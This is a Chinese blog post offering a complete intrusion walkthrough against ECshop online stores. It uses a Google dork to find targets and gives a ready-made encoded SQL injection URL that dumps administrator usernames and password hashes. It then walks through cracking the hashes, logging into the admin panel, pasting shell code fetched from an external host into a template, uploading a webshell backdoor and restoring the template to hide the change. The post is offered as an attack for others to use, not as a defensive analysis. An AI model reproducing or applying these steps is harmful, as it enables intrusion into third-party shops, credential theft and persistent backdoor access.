首页 » 二次开发 » 阅读文章

ECshop搜索SQL注入问题

2011-01-06 11:42 4077 0 发表评论
标签:

无聊阿,直接丢个ecshop通杀所有版本读取管理员帐号出来给大家去玩玩~~~ 

google搜索:powered by ecshop malaysia
然后就会出现一堆了,然后。。。 

入侵步骤: 

1.google搜索
 

2.网址栏输入 

  1. search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

复制代码 

 

3.管理员帐号与密码出来了,如图:用户名是 admin, md5加密后的密码是 ff34aafa01405a2277ca6d90eaa72c94 

 

4.下来我们使用 http://www.c0llision.net/webcrack.php破解md5加密后的密码 

5.密码破解出来后,我们就可以使用该用户名以及密码登录ecshop后台了,ecshop后台目录是 http://目标/admin
 

6. 进入后台后,电击左边menu里的 模板管理>库项目管理 , 然后选择 myship.lbi
 

7. 然后把以下文件的代码复制进去
https://sites.google.com/site/wming79/shell.php?attredirects=0&d=1 

 

8. 访问 http://目标/myship.php, 登录密码: 12345
 

9. 登录后,点击images或者data目录
 

10. 上传我们的后门webshell: shell.php
 

11. 上传成功后,尝试访问后门,http://目标/images/shell.php 又或者 http://目标/的data/shell.php
 

12. 下来记得要还原我们修改的模板文件,点击 还原到上一次修改, 然后点击确定
 

13. 之后就自由发挥吧 


 
本文地址:http://www.jwzzsw.com/archives/729.html

文章作者:思悟
版权所有 © 转载时请以链接形式注明作者和原始出处!

评论 共0条 (RSS 2.0) 发表评论

  1. 暂无评论,快抢沙发吧。

发表评论

联系我 Contact Me

回到页首